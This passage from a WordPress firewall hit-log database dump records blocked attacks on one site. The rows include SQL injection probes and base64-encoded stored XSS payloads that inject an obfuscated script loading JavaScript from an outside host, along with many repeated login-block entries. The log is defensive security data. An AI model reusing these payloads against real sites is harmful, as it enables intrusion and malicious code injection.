K2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8114,1564715956.254614,1564715955.827500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8057,1564682648.175423,1564682645.392600,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?Action=EWD_UFAQ_UpdateOptions',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8115,1564715954.558513,1564715954.177300,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAiYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8058,1564682642.378158,1564682639.547900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8116,1564715952.312300,1564715951.915700,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8059,1564682638.524225,1564682635.579800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7532,0.000000,1564493699.059913,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7533,1564493702.065774,1564493701.178000,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7534,1564493773.807002,1564493773.300100,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7535,1564493772.311886,1564493771.654500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7536,1564493770.528008,1564493769.938800,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7537,1564493768.919310,1564493768.387900,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7538,1564493767.402301,1564493765.290000,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7539,1564493764.237632,1564493763.670500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7540,1564493762.596638,1564493761.759100,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7541,1564493760.717114,1564493759.782400,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7542,1564493758.771394,1564493758.253500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7543,1564493757.170023,1564493756.504200,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7544,1564493755.552303,1564493755.033300,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7545,1564493754.073757,1564493753.549900,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7546,1564493752.559853,1564493752.085900,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7547,1564493751.087477,1564493750.559500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7548,1564493749.584633,1564493748.805500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7549,1564493747.765952,1564493747.081200,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7550,1564493746.103362,1564493745.406100,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7551,1564493744.409258,1564493743.601300,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7552,1564493742.575721,1564493741.894600,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7553,1564493740.914436,1564493740.414300,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7554,1564493739.437801,1564493738.999100,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7555,1564493737.914495,1564493737.443500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7556,1564493736.484461,1564493736.045300,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7557,1564493735.081394,1564493734.572400,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7558,1564493733.571557,1564493733.039700,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7559,1564493732.023005,1564493731.419000,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7560,1564493730.362491,1564493729.803800,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7561,1564493728.712714,1564493727.907500,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7562,1564493725.764748,1564493725.151900,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7563,1564493724.114286,1564493723.567000,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7564,1564493722.560359,1564493721.995700,'\0\0\0\0\0\0\0\0\0\0%r',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 